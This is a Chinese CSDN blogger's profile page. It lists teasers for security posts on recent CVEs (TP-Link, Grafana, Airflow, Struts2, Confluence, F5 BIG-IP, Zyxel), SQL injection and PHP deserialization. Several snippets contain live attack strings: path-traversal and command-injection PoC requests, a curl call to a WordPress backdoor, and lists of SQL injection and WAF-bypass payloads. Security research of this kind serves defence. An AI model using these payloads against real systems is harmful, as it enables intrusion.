三鲜水饺子
码龄6年
关注
提问 私信
  • 博客:59,590
    动态:103
    59,693
    总访问量
  • 24
    原创
  • 1,585,597
    排名
  • 62
    粉丝
  • 0
    铁粉

个人简介:脚本小子模式

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:广东省
  • 加入CSDN时间: 2018-08-28
博客简介:

PolarPeak的博客

查看详细资料
个人成就
  • 获得51次点赞
  • 内容获得9次评论
  • 获得85次收藏
  • 代码片获得362次分享
创作历程
  • 19篇
    2022年
  • 5篇
    2021年
成就勋章
TA的专栏
  • 漏洞库
    13篇
兴趣领域 设置
  • 网络空间安全
    系统安全web安全安全架构
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

(CVE-2022-30075) Tp-Link Archer AX50 Authenticated RCE

在Tp-Link路由器中进行身份验证的远程代码执行如果您的Tp-Link路由器具有备份和恢复功能,并且固件早于2022年6月,它可能很脆弱Tp-Link Archer AX50,其他tplink路由器可能会使用不同格式的备份,漏洞需要修改......
原创
发布博客 2022.06.13 ·
1397 阅读 ·
1 点赞 ·
1 评论 ·
1 收藏

CVE-2022-32275 Grafana 8.4.3

转到登录页面并在登录参数上输入payload : /dashboard/snapshot/*?orgId=0%20/invite/:
原创
发布博客 2022.06.07 ·
619 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

CVE-2022-32275 Grafana 8.4.3

CVE-2022-32275 Grafana 8.4.3 允许通过a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd 来读取文件
原创
发布博客 2022.06.07 ·
760 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

金榜题名

发布动态 2022.06.07

CVE-2022-24288 Apache Airflow RCE POC/EXP

在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。这可以通过确保设置为来缓解。(payload1 2是俩个不同利用点,选择用一个就行)...
原创
发布博客 2022.06.06 ·
1151 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现

远程代码执行S2-062(CVE-2021-31805)由于Apache Struts2对S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。高危。受影响的版本:Struts 2.0.0 - Struts 2.5.29安全版本:Struts >= 2.5.30漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25链接:vulhub/struts2/
原创
发布博客 2022.06.06 ·
1458 阅读 ·
2 点赞 ·
0 评论 ·
0 收藏

CVE-2022-29383 NETGEAR ProSafe SSL SQL注入漏洞

Firmware version: FVS336Gv2 - FVS336Gv3
原创
发布博客 2022.06.05 ·
752 阅读 ·
2 点赞 ·
1 评论 ·
0 收藏

CVE-2022-24990信息泄露 RCE漏洞

Terramaster TOS是中国铁威马(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。 Terramaster TOS 4.2.29版本存在命令注入漏洞,该漏洞源于api.php脚本中的webNasIPS 组件中的输入验证不正确。未经身份验证的攻击者可以发送特殊数据利用该漏洞并在目标系统上执行任意命令。 TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE
原创
发布博客 2022.06.05 ·
2321 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

Atlassian Confluence 远程代码执行/CVE-2022-26134

近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。 Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自...
原创
发布博客 2022.06.05 ·
1044 阅读 ·
4 点赞 ·
0 评论 ·
1 收藏

SQL注入Bypass WAF

Best WAF Bypass 1 :order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/UNION select/*!00000Union*/ /*!00000Select*//*!50000%55nIoN*/ /*!5000...
原创
发布博客 2022.06.01 ·
3083 阅读 ·
0 点赞 ·
0 评论 ·
5 收藏

SQL注入Payloads

Generic SQL Injection Payloads'''```,"""///\\\;' or "-- or # ' OR '1' OR 1 -- -" OR "" = "" OR 1 = 1 -- -' OR '' = ''=''LIKE''=0--+ OR 1=1' OR 'x'='x' AND id IS NULL; --'''''''''''''UNION SELECT '2%00/*…*/ + addition, concaten
原创
发布博客 2022.05.30 ·
1080 阅读 ·
5 点赞 ·
0 评论 ·
5 收藏

CVE-2022-1609 WordPress Weblizar Backdoor

$curl-s-d'blowfish=1'-d"blowf=system('id');"'http://localhost:8888/wp-json/am-member/license'uid=33(www-data)gid=33(www-data)groups=33(www-data)
原创
发布博客 2022.05.30 ·
660 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

CVE-2021-46422 SDT-CW3B1 1.1.0 - OS Command Injection

poc:hxxp://x.x.x.x/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
原创
发布博客 2022.05.25 ·
544 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

CVE-2022-1388-EXP(F5-BIGIP)

简介F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。EXPPOST /mgmt/tm/util/bash HTTP/1.1Host: X-F5-Auth-Token: aAuthorization: Basic YWRtaW46Connection: keep-alive, x-F5-Auth-TokenContent-Length: 0Cache-Control: max-age=0{
原创
发布博客 2022.05.14 ·
1059 阅读 ·
2 点赞 ·
0 评论 ·
4 收藏

(CVE-2022-30525)Zyxel 防火墙未经身份验证的远程命令注入

前言该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。影响版本影响组件 固件版本USG FLEX 100, 100W, 200, 500, 700
原创
发布博客 2022.05.14 ·
1909 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

CTF-时间盲注专题

文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query`参考时间盲注Heavy Query个人认为这个方法是本题的最优解原理就如方法的名字:大负荷查询即用到一些消耗资源的方式让数据库的查询时间尽量变长而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来而最后找到系统
原创
发布博客 2022.04.25 ·
2717 阅读 ·
2 点赞 ·
0 评论 ·
2 收藏

IDEA pom.xml爆红解决方案

好久不开IDEA,一打开全是爆红。想起之前切换了jdk,这里按要求更改一下以ysoserial为例打开pom全红尝试了一下右击reload几次还是不行,也尝试了Download Sources and Documentation,还是不行。然后我就去setting.xml更新了maven仓库 <mirror> <id>aliyunmaven</id> <mirrorOf>*</
原创
发布博客 2022.04.22 ·
5030 阅读 ·
2 点赞 ·
2 评论 ·
4 收藏

记录刚上大学的我是如何攻破教务系统(教务系统漏洞)

还想看什么,欢迎点赞评论留言回忆录:时间回到2018年某日:在别人都准备复习的时候,我默默打开学校门户系统这些快速导航的系统都是不需要再次验证的找了一圈没发现未授权漏洞,看来想搞事情可以先拿门户系统祭天了门户系统规则就是学号(工号)+身份证后六位不过你想拿到一个账号还是挺简单的,可以通过社工和学校的贴吧找到很多规则很多学校贴吧会放一些失物招领什么的(也会有一些失物招领的群)因为我有现成的账号,直接开搞吧我把门户系统所有功能点看了一遍,在用户设置处发现可控参数.
原创
发布博客 2022.01.14 ·
7060 阅读 ·
8 点赞 ·
1 评论 ·
15 收藏

PHP反序列化漏洞成因及漏洞挖掘技巧与案例

一、序列化和反序列化序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。反序列化本身并不危险,但是如果反序列化时,传入反序列化函数的参数可以被用户控制那将会是一件非常危险的事情。不安全的进行反序列化造成的危害只有你想不到,没有他做不到,是的,没错。序列化和反序列化的原理已经有很多文章
原创
发布博客 2022.01.02 ·
1591 阅读 ·
1 点赞 ·
0 评论 ·
6 收藏

OAuth安全相关问题

初识OAuth开放授权(OAuth)是一个开放标准,允许用户让第三方应用访问该用户在某一网站上存储的私密的资源(如照片,视频,联系人列表),而无需将用户名和密码提供给第三方应用.目前广泛使用的版本是OAuth 2.0.而OAuth2.0存在认证缺陷-即第三方帐号快捷登录授权可能被劫持。OAuth 2.0中有6种常用的授权类型:Authorization Code Implicit Password Client Credentials Device Code Refresh T..
原创
发布博客 2022.01.02 ·
4567 阅读 ·
3 点赞 ·
2 评论 ·
1 收藏
加载更多